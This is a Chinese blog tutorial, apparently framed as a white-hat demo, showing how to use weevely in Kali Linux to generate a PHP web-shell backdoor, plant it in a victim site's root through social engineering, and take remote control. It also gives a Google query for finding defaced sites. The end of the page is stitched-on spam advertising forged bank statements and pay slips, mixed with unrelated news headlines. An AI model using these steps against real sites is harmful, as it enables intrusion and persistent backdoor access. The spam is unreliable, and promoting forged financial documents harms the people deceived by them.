首发于 分享原创Kali Linux与编程技巧!
网络安全工程师演示:白帽黑客使用Kali Linux“中国菜刀”weevely网站渗透技巧

网络安全工程师演示:白帽黑客使用Kali Linux“中国菜刀”weevely网站渗透技巧


一、背景介绍

生成和管理很难检测到的PHP木马,Weevely是一个隐形的PHP网页的外壳,模拟的远程连接。这是一个Web应用程序后开发的重要工具,可用于像一个隐藏的后门,作为一个有用的远程控制台更换管理网络帐户,即使托管在免费托管服务。只是生成并上传“服务器”目标Web服务器上的PHP代码,Weevely客户端在本地运行shell命令传输。

那么如何利用weevely控制目标主机呢?接下来让我们一起学习!


二、资源装备

1.安装好 Kali Linux 的虚拟机一台

2.受害者主机一个;

3.整装待发的小白一个。


三、渗透测试

3.1 利用搜索引擎检索已经被黑客挂黑页的网站,如下图所示。

谷歌语法:intltle:hacked by



3.2 在攻击者主机打开Kali 中的中国菜刀软件(weevely),如下图所示。

命令:weevely




3.3 在受害者主机安装网站环境,这里以phpstudy集成环境举例,如下图所示。

步骤:百度检索phpstudy

下载网址: xp.cn/download.html

安装教程: php.cn/php-weizijiaoche






3.4 利用weevely工具在攻击者主机生成shell.php后门文件,如下图所示。

命令:weevely generate admin /tmp/shell.php



3.5 查看生成的shell.php文件内容,如下图所示。

命令:cat /tmp/shell.php



3.6 将生成的后门文件利用社会工程学导入受害者网站根目录,如下图所示。





3.7 查看受害者主机的IP地址,如下图所示。

命令:ipconfig



3.8 连接后门,如下图所示。

命令:weevely 192.168.0.103/shell.php admin




3.9 查看拿下的网站目录,如下图所示。

命令:dir



代做工资流水公司洛阳银行流水账图片九江开自存流水福州自存流水图片厦门办理公司流水苏州办企业贷流水荆州签证工资流水公司广州打印入职流水南宁房贷银行流水 开具赣州打印工资流水账单温州流水账单代开肇庆代开转账银行流水济宁房贷流水制作昆明房贷收入证明价格潮州企业银行流水代做青岛代办贷款工资流水保定企业对公流水代开江门查询银行流水电子版济南背调银行流水制作徐州工作收入证明办理孝感入职银行流水价格信阳自存流水图片漳州工资证明查询常州制作车贷工资流水济宁打印工资流水app截图重庆房贷工资流水 开具宁波对公流水模板宁波代办车贷银行流水南宁打个人流水宿迁银行流水账代做福州打印流水账单香港通过《维护国家安全条例》两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”19岁小伙救下5人后溺亡 多方发声卫健委通报少年有偿捐血浆16次猝死汪小菲曝离婚始末何赛飞追着代拍打雅江山火三名扑火人员牺牲系谣言男子被猫抓伤后确诊“猫抓病”周杰伦一审败诉网易中国拥有亿元资产的家庭达13.3万户315晚会后胖东来又人满为患了高校汽车撞人致3死16伤 司机系学生张家界的山上“长”满了韩国人?张立群任西安交通大学校长手机成瘾是影响睡眠质量重要因素网友洛杉矶偶遇贾玲“重生之我在北大当嫡校长”单亲妈妈陷入热恋 14岁儿子报警倪萍分享减重40斤方法杨倩无缘巴黎奥运考生莫言也上北大硕士复试名单了许家印被限制高消费奥巴马现身唐宁街 黑色着装引猜测专访95后高颜值猪保姆男孩8年未见母亲被告知被遗忘七年后宇文玥被薅头发捞上岸郑州一火锅店爆改成麻辣烫店西双版纳热带植物园回应蜉蝣大爆发沉迷短剧的人就像掉进了杀猪盘当地回应沈阳致3死车祸车主疑毒驾开除党籍5年后 原水城县长再被查凯特王妃现身!外出购物视频曝光初中生遭15人围殴自卫刺伤3人判无罪事业单位女子向同事水杯投不明物质男子被流浪猫绊倒 投喂者赔24万外国人感慨凌晨的中国很安全路边卖淀粉肠阿姨主动出示声明书胖东来员工每周单休无小长假王树国卸任西安交大校长 师生送别小米汽车超级工厂正式揭幕黑马情侣提车了妈妈回应孩子在校撞护栏坠楼校方回应护栏损坏小学生课间坠楼房客欠租失踪 房东直发愁专家建议不必谈骨泥色变老人退休金被冒领16年 金额超20万西藏招商引资投资者子女可当地高考特朗普无法缴纳4.54亿美元罚金浙江一高校内汽车冲撞行人 多人受伤

代做工资流水公司 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化